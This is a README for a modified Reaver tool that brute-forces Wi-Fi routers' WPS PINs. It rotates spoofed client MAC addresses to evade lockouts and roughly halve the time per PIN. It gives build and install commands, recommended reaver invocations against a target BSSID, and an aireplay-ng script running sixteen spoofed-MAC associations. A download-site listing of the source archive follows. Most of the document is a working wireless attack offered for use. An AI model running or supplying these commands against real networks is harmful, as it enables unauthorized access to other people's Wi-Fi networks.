REAVER WPS WITH MAC CHANGER
==============
REAVER WPS modified version with MAC Address last character changer to speed up the attack.
Well, some times the AP will reject the "EAPOL Request" after a success pin try. I made some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets "WARNING: Receive timeout occurred", the other gets "Received identity request" and continue the cracking.
The problem of this method is: The reaver tool doesn't support simultaneous instances (ok, I read the FAQ about it). If you run two reaver instances, by example, the two instances will try the same pin at the same time.
I made some changes on the reaver source code. Look the output after my changes:
```
[+] Using MAC BC:99:47:B7:03:E9
[+] Trying pin 00485678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E8
[+] Trying pin 00495677
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E7
[+] Trying pin 00505673
...
```
On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not a real MAC, I'm just using for the example), on the second, "BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of the MAC "BC:99:47:B7:03:E0", reaver will start again on "BC:99:47:B7:03:E9".
The numbers:
With this method: (13 seconds/pin)
Without this method: (31 seconds/pin)
How to install
==============
Extract the tarball
```bash
tar -xzvf reaver-1.4-mac-changer.tar.gz
```
Install Required Libraries and Tools
```bash
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
```
Build Reaver
```bash
cd reaver-1.4-mac-changer
cd src
./configure
make
```
Install Reaver
```bash
sudo make install
```
How to use
==============
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
```
or
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
```
What I recommend:
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
```
To associate more effectively, I recommend to use aireplay-ng tool. Create a "associate.sh" file, and put this inside:
```bash
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
```
PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC (without the last digit).
Before using reaver tool, just type "sh associate.sh". To kill all the aireplay-ng, type "killall aireplay-ng".
If you have success using this method, please, share with us to improve more and more the reaver WPS.
Author
==============
[@gabrielrcouto](http://www.twitter.com/gabrielrcouto)
License
==============
[MIT License](http://zenorocha.mit-license.org/)
没有合适的资源?快使用搜索试试~ 我知道了~
资源详情
资源评论
资源推荐
收起资源包目录
reaver-wps-master.zip_opos_reaver_visual c_wps (276个子文件)
iftab.5 9KB
iftab.5 6KB
iftab.5 5KB
wireless.7 3KB
wireless.7 3KB
wireless.7 2KB
iwconfig.8 18KB
iwconfig.8 18KB
iwconfig.8 16KB
ifrename.8 5KB
ifrename.8 4KB
iwlist.8 4KB
ifrename.8 4KB
iwpriv.8 4KB
iwevent.8 4KB
iwlist.8 4KB
iwgetid.8 4KB
iwpriv.8 3KB
iwspy.8 3KB
iwevent.8 3KB
iwlist.8 3KB
iwevent.8 3KB
iwpriv.8 3KB
iwspy.8 3KB
iwspy.8 3KB
iwgetid.8 3KB
iwgetid.8 3KB
configure.ac 655B
keys.c 183KB
iwlib.c 87KB
libtommath.c 76KB
wps_registrar.c 76KB
tls_openssl.c 71KB
ifrename.c 69KB
iwlist.c 60KB
x509v3.c 49KB
iwconfig.c 46KB
aes-internal.c 40KB
tls_gnutls.c 36KB
pcsc_funcs.c 33KB
wps_enrollee.c 32KB
tlsv1_server_read.c 29KB
iwpriv.c 28KB
dh_groups.c 25KB
tlsv1_client_read.c 25KB
wpa_common.c 21KB
tlsv1_client_write.c 20KB
iwevent.c 20KB
tlsv1_server_write.c 20KB
80211.c 20KB
tls_schannel.c 19KB
tlsv1_client.c 18KB
crypto_cryptoapi.c 16KB
tlsv1_server.c 16KB
tls_nss.c 15KB
des-internal.c 15KB
builder.c 15KB
wps_common.c 15KB
tls_internal.c 15KB
ms_funcs.c 15KB
exchange.c 15KB
crypto_libtomcrypt.c 14KB
eloop.c 13KB
iwgetid.c 13KB
wps.c 13KB
eloop_win.c 12KB
wpsmon.c 12KB
tlsv1_cred.c 12KB
tlsv1_record.c 11KB
crypto_openssl.c 11KB
cracker.c 11KB
sql.c 10KB
wps_attr_parse.c 10KB
iwspy.c 10KB
milenage.c 10KB
globule.c 10KB
wpa_ctrl.c 10KB
wps_dev_attr.c 10KB
radiotap.c 9KB
argsparser.c 9KB
sha1-internal.c 9KB
md5-internal.c 9KB
crc.c 9KB
rsa.c 9KB
wpa_debug.c 8KB
wps_attr_build.c 8KB
wps_attr_process.c 8KB
md4-internal.c 8KB
session.c 8KB
eloop_none.c 8KB
common.c 8KB
libwps.c 8KB
tlsv1_common.c 7KB
os_internal.c 7KB
wpscrack.c 7KB
os_unix.c 7KB
ieee802_11_common.c 7KB
crypto_gnutls.c 7KB
wpabuf.c 7KB
trace.c 7KB
共 276 条
- 1
- 2
- 3
小波思基
- 粉丝: 85
- 资源: 1万+
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0